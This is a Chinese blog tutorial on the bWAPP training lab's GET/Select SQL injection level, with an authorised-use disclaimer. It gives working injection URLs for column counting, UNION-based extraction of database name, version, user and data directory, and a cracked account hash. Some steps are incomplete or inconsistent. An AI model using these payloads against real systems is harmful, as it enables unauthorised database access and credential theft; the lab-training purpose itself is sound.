渗透入门之SQL 注入(二)

最新推荐文章于 2026-01-01 22:38:21 发布
原创 最新推荐文章于 2026-01-01 22:38:21 发布 · 860 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #SQL注入 #渗透

重要声明

        SQL注入实验仅可在自己搭建的合法测试环境(如本地虚拟机、授权的测试服务器)中进行,严禁对任何非授权系统实施测试,否则可能违反《网络安全法》等法律法规,需承担相应法律责任。

接上一篇渗透入门之SQL 注入(一)

  1. SQL Injection (GET/Select):GET请求数据查询类注入

BWAPP的SQL Injection (GET/Select)漏洞属于下拉选择框驱动的GET参数注入,核心特征是页面通过下拉选单(如选择国家/地区、类别等)提交GET参数(典型参数名:movie),参数通常关联数据库的主键/索引字段,易触发数字型(或字符型)SQL注入。与Search类注入的核心区别:注入点是下拉选单对应的ID类GET参数,而非搜索框的字符串参数,测试逻辑需适配数字型注入特征。

1步骤1:进入漏洞页面

  • 访问BWAPP首页(如http://192.168.0.100/bwapp),使用默认账号bee、密码bug登录;
  • 在“Choose your bug”下拉框中选择SQL Injection (GET/Select),点击Hack按钮进入漏洞页面;
  • 观察页面特征:
  • 页面显示“Select a movie”下拉选择框
  • 选择任意选项,点击提交,URL自动变为:http://192.168.0.100/bwapp/sqli_2.php?movie=2&action=go
  • 核心结论:movie是GET注入参数,目标是对该参数进行注入测试。

(2)  步骤2:判断注入点类型及存在性

目标:确认movie参数是否存在注入,以及注入类型(数字型/字符型)。

测试1:数字型注入验证

  • 正常请求:
  • 正常请求:http://192.168.0.100/bwapp/sqli_2.php?movie=2&action=go → 页面显示movie相关数据;

  • 结论:movie参数存在数字型SQL注入

(3)  步骤3:判断后台查询的字段数(ORDER BY)

目标:确定后台SQL查询的字段数量,为联合查询铺垫。

构造URL(逐步增加ORDER BY后的数字,直到报错):

  • http://192.168.0.100/bwapp/sqli_2.php?movie=2 ORDER BY 2&action=go → 页面正常;

  • http://192.168.0.100/bwapp/sqli_2.php?movie=2 ORDER BY 8&action=go → 报错

结论:后台SQL查询的字段数为7

(4)步骤4:联合查询找“显位”(可显示数据的列)

目标:让原查询无结果,强制显示联合查询的结果,确定哪些列会在页面展示。

  • 构造URL(用movie=-1让原查询无匹配结果,UNION SELECT拼接查询):

http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,2,3,4,5,6,7&action=go

  • 观察页面:数字234等会显示在页面中,说明第列是显位(可展示注入提取的数据)。

(5)步骤5:获取数据库基础信息

利用UNION SELECT提取MySQL核心信息,替换显位为目标函数:

目标信息

构造URL示例(数字型)

预期结果示例

当前数据库名

http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,database(),3&action=go

bwapp

目标信息

构造URL示例(数字型)

预期结果示例

MySQL版本

http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,version(),3&action=go

5.0.96

目标信息

构造URL示例(数字型)

预期结果示例

数据库用户

http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,user(),3&action=go

root@localhost

目标信息

构造URL示例(数字型)

预期结果示例

数据存储目录

http://192.168.0.100/bwapp/sqli_2.php?movie=-1 UNION SELECT 1,@@datadir,3&action=go

/var/lib/mysql/

(6)步骤6:获取bwapp数据库的表名

详见渗透入门之SQL注入(一)

(7)步骤7:获取users表的列名

 详见渗透入门之SQL注入(一)

(8)步骤8:提取users表的账号密码数据

  详见渗透入门之SQL注入(一)

页面会显示用户数据:

显位2(由上章节用户名存在login里)

显位3(password,MD5加密)

A.I.M.

6885858486f31043e5839c735d99457f045affd0

解密MD5值:A.I.M.对应密码bug。

(9)步骤9:验证结果

使用提取到的用户名密码登录BWAPP,验证账号密码的有效性,确认注入结果正确。

lightningyang
关注
渗透测试之sql注入验证安全与攻击性能
cc123489ll的博客
04-23 1068
🍅文末有免费的配套视频可观看🍅,免费获取软件测试全套资料,资料在手,涨薪更快由于渗透测试牵涉到安全性以及攻击性,为了便于交流分享,本人这里不进行具体网址的透露了。我们可以在网上查找一些公司官方网站。
渗透入门SQL注入
LongL_GuYu的博客
07-04 288
SQL注入是一种网络安全漏洞,攻击者利用这个漏洞将恶意的SQL代码插入到Web应用程序的输入字段中。当这些输入数据被应用程序的数据库查询使用时,恶意的SQL代码也会被执行。这可能导致数据泄露、数据丢失、数据破坏、非授权访问、会话劫持等安全问题。
渗透sql注入---实战1
qq_64302290的博客
04-29 1046
该网站上进行。
web渗透(安全漏洞——SQL注入
m0_73747735的博客
02-21 940
sqlmap是一个开源的渗透测试工具,可以自动化检测和利用sql注入缺陷以及接管数据库服务器的过程。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。1. sqlmap超详细笔记+思维导图 - bmjoker - 博客园 (cnblogs.com)最新SQLMap安装与入门技术 - FreeBuf网络安全行业门户支持的注入方式:布尔盲注、时间盲注、报错注入、联合查询、堆叠注入
[BUUCTF从零单排] Web方向 03.Web入门篇之sql注入-1(手工注入详解)
杨秀璋的专栏
09-29 1673
前文介绍了Web方向的基础题目——常见的搜集,该题目主要考察信息收集知识。这篇文章同样是Web方向的题目,主要介绍SQL注入内容——sql注入-1,第一篇详细讲解手工注入,后面再结合工具SQLMAP介绍。为了方便大家思考,文章摘要部分尽量少提,大家也可以先尝试实践,再看WriteUp。基础性文章,希望对您有所帮助,尤其是对网络安全工具的使用和理解。
渗透测试入门学习——SQL注入基本流程与手动注入技巧SQLi-labs靶场练习
qq_44611153的博客
10-30 1248
SQLi-labs靶场采用的是mysql数据库,再进行SQL注入时需要注意mysql内置的几个存放重要信息的系统库(高版本5.0以上特有):1、information_schema库:存放着MySQL服务器中数据库的信息(SCHEMATA表存放所有库名、TABLES表存放所有表名、COLUMNS表存放所有字段名)2、performance_schema库:存放着MySQL服务器的性能数据,即执行SQL语句花费了多少时间、内存使用情况等。
搞懂安全渗透SQL 注入入门篇)
不想打代码
07-21 5128
安全渗透的分类 web 数据库安全 (SQL注入漏洞) web 应用服务器安全 (文件上传漏洞,文件包含漏洞) web 客户端安全 (XSS跨站攻击) SQL注入介绍 SQL注入在安全问题种排行榜首 SQL注入攻击指的是 输入参数未经过滤,然后直接拼到SQL语句当中解析 SQL注入是一种将 SQL 代码添加到输入参数中,传递到服务器解析并执行的一种攻击手法 SQL注入原理 攻击者在页面提交恶意字符 服务器未对提交参数进行过滤或过滤不足 攻击者利用拼接SQL语句方式获取数据库敏感信息 举个最简单
SQL注入入门基础
weixin_51583379的博客
10-19 1287
mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表, 我当前的版本mysql 5.7.22。mysql权限表的验证过程为:先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在,存在则通过验证。通过身份认证后,进行权限分配,按照user,db,tables_priv,columns_priv的顺序进行验证。
渗透测试SQL注入之【常规的SQL注入语句】这个渗透测试知识点教会你如何去做一些常规的sql注入
qq_41314882的博客
05-29 1328
SQL注入是一种常见的Web安全漏洞,指攻击者通过构造恶意SQL语句插入到输入参数中,使服务器执行非预期的数据库操作。本文介绍了SQL注入的原理、类型及常见测试方法: 注入原理:未过滤的用户输入直接拼接SQL语句,导致执行恶意查询 主要类型: 数字型注入:id=1 or 1=1 字符型注入:username='admin' or 1=1 # 搜索型注入:需闭合%符号 XX型注入:需闭合括号 检测方法: 单/双引号测试引号闭合 or 1=1返回所有数据 and 1=2返回空集 联合查询需匹配字段数 防御建议:
渗透实战系列】 从SQL注入渗透内网(渗透的本质就是信息搜集)
qq_41314882的博客
10-25 1278
一个 SQL 注入可以帮我们的不仅仅是获取数据库表里的数据,还能让我们直接获取到目标服务器的权限,减少我们渗透的时间,本文主要围绕 SQL 注入如何进内网来写的,不多说兄弟们看文章就完事了。
渗透学习入门SQL注入
07-31
渗透学习入门SQL注入 SQL 注入是一种常见的Web 应用程序漏洞,攻击者通过构造恶意输入来访问或控制数据库中的数据。SQL 注入攻击通常发生在Web 应用程序使用用户输入来构建动态SQL 语句时,攻击者可以 inject ...
精选资源
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
基础-SQL-DCL
2401_84643729的博客
12-27 339
MySQL基础——SQL——DCL
JSON数据一键导入SQL Server
tzjly的专栏
12-31 455
print(f"📊 共 {len(data) if isinstance(data, list) else 1} 条记录")table_name = input("请输入表名 (默认为 json_data): ") or "json_data"json_file_path = input("请输入JSON文件的完整路径: ").strip()print(f"📄 使用命令行指定的JSON文件: {json_file_path}")print(f"不支持的数据格式: {type(data)}")
DM SQL 排序优化-消除排序
12-31 294
关键发现:上面执行计划中出现了 SORT3 操作符,说明数据库在进行显式排序,可以通过ET 输出,可以判断使用了多少内存(MEM_USED(KB),DISK_USED(KB))。在数据库查询优化中,ORDER BY 子句导致的排序操作往往是性能瓶颈之一。当前测试展示如何通过合理的索引设计来消除排序操作,显著提升查询性能。数据库通过反向扫描索引直接获得了正确排序的结果。业务需求:查询最近11 年的员工信息,并按入职时间降序、员工ID 降序排列。虽然使用了复合索引,但排序方向不匹配。技术分享社区 ECO。
浅谈Qt中的QSql模块整体设计
最新发布
红军不怕远征难,万水千山只等闲
01-01 531
Qt的QSql模块是Qt框架提供的数据库抽象层,旨在屏蔽不同数据库(如SQLite、MySQL等)的底层API差异,提供统一的操作接口。其核心设计包括三层架构:应用层调用API执行数据库操作,抽象接口层定义统一接口(如QSqlDatabase、QSqlQuery),驱动适配层通过插件机制适配具体数据库。QSql支持SQL执行、参数绑定、事务控制等功能,并与Qt的MVC组件深度整合。模块采用工厂模式、适配器模式等设计模式,确保扩展性和跨平台兼容性。开发者可通过自定义驱动和模型扩展功能,但需注意线程安全和性能优
MyBatis SQL解析模块详解
qq_41262225的博客
12-30 1040
MyBatis的SQL解析模块是连接SQL语句与数据库执行的关键桥梁,负责SQL语句解析、动态SQL处理、参数绑定和SQL生成。该模块采用分层设计,核心组件包括LanguageDriver、SqlSource和BoundSql等。动态SQL标签通过OGNL表达式实现条件判断和循环功能,XMLScriptBuilder负责解析SQL脚本为SqlNode树。SqlSource根据是否包含动态标签分为DynamicSqlSource和RawSqlSource,最终生成可执行的BoundSql对象。该模块实现了从X
PostgreSQL 18 从新手到大师:实战指南 - 2.5 Serverless PostgreSQL
AI 题库 —— 软件编程老兵专属分享阵地,聚焦青少年编程等级考、Python/C++ 信息学奥赛、机器人技术等级考试备考干货,依托智能题库资源,用 5 年一线教学经验助力编程学习高效备考!
01-01 641
本文介绍了Serverless PostgreSQL的核心概念及其开源实现Neon。Serverless PostgreSQL采用存储-计算分离架构,具有按需计算、自动扩展、按使用付费等特点,相比传统PostgreSQL大幅简化了运维工作。文章详细解析了Neon的三层架构(计算层、存储层、控制层)及其工作原理,并提供了Neon的安装配置指南和数据库管理方法。Serverless PostgreSQL特别适合访问量波动大、快速开发、SaaS应用等场景,能有效降低资源成本和运维复杂度。
C# 语言 SQL Server 批量更新
StevenChen的博客
12-28 621
本文详细介绍了C#操作SQL Server实现批量更新的多种方案。针对小数据量(1000条以内)推荐参数化SQL拼接或CASE WHEN优化;对于大数据量(1000条以上)建议使用SqlBulkCopy+临时表方案或Dapper框架。重点强调了SQL注入防护、事务保护、连接释放等关键注意事项,并提供了完整的代码实现。不同场景下的最优选择:小数据量注重简洁高效,大数据量追求高性能低损耗,同时兼顾开发效率与数据安全。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值